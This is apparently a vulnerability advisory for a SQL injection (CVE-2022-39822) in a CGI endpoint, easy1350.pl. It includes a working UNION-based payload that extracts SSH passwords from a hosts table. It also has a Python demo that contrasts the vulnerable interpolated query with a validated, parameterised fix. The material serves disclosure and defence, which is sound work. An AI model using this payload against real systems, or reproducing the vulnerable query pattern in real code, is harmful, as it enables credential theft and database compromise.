Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89
Software Version: R19.9
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822
CVSSv3: 8.8
Severity: High
Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli
The web application is affected by an SQL Injection vulnerability. By injecting arbitrary SQL statements, an attacker can alter the syntax of the query and perform unauthorized (and unexpected) operations against the remote database.
Step-by-step instructions and PoC
A remote user, authenticated to the web application, may manipulate the request parameters so that the database emits an error; the error output reveals the structure of the database and can then be used to extract the contents of the data through the injected statement. Please see the examples below for step-by-step instructions to reproduce the vulnerability.
Affected Endpoints
· URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1&host=1
· HTTP Parameter: id, host
Below is the evidence, with the vulnerability details and the payload used.
GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1
Host: <host>
Cookie: XSRF=[REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Authorization: Basic [REDACTED]
Connection: close
The first step consists of changing the value of the parameter to obtain an SQL error.
The attacker can then manipulate the parameter passed to the function to discover user names, data from other tables, or eventually the database hostname. In this case it was possible to extract the SSH password of the root user.
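The root cause described above, a request parameter spliced directly into the SQL text, is illustrated here with an added example that is not part of the advisory and not the vendor's code. It parses the `id` parameter from the request target shown in the evidence (session value kept as the `[REDACTED]` placeholder), runs it against a constructed in-memory SQLite database whose `master` and `hosts` tables and their rows are assumptions modelled on the column names in the request, and contrasts the vulnerable string-built query with a hardened version that validates the parameter and binds it as a placeholder.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Request target copied from the advisory's evidence; the session token is a placeholder.
REQUEST_TARGET = (
    "/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]"
    "&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1"
)


def request_params(target):
    """Decode the query string the way a CGI script sees it ('+' becomes a space)."""
    return {key: values[0] for key, values in parse_qs(urlsplit(target).query).items()}


def build_db():
    """Constructed sample schema and rows (assumption, not the real application's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE master (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE hosts  (id INTEGER PRIMARY KEY, hostname TEXT, ssh_password TEXT);
        INSERT INTO master VALUES (1, 'first record'), (2, 'second record');
        INSERT INTO hosts  VALUES (1, 'db01', 'secret-one'), (2, 'db02', 'secret-two');
        """
    )
    return conn


def edit_master_vulnerable(conn, record_id):
    """Vulnerable pattern: the parameter is interpolated into the SQL text, so a quote
    closes the literal and everything after it is parsed as SQL (the UNION in the payload
    pulls rows from the unrelated hosts table into the result)."""
    sql = f"SELECT name FROM master WHERE id = '{record_id}'"
    return sorted(row[0] for row in conn.execute(sql))


def edit_master_fixed(conn, record_id):
    """Hardened pattern: reject anything that is not a plain integer, then pass the value
    as a bound parameter so the database never parses it as SQL."""
    if not record_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT name FROM master WHERE id = ?"
    return sorted(row[0] for row in conn.execute(sql, (int(record_id),)))


def demo():
    """Run the advisory's payload through both code paths and report what each returns."""
    params = request_params(REQUEST_TARGET)
    conn = build_db()
    leaked = edit_master_vulnerable(conn, params["id"])
    try:
        edit_master_fixed(conn, params["id"])
        rejected = False
    except ValueError:
        rejected = True
    return {
        "payload": params["id"],
        "vulnerable_rows": leaked,          # includes the concatenated hosts.ssh_password values
        "fixed_rejects_payload": rejected,  # True: malformed id never reaches the database
        "fixed_normal_lookup": edit_master_fixed(conn, "1"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key} = {value}")
```

Two layers are applied in the hardened function on purpose: the integer check stops malformed input at the edge, and the bound parameter means that even a value that slips past validation is treated as data rather than as query text. Either alone would have prevented the behaviour described in this advisory; together they also keep the database error output, which the attacker relied on for enumeration, out of reach.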
Security Impact
Malicious users can access the data processed by the database and potentially conduct further attacks against the database, other users of the portal, and the server machine itself.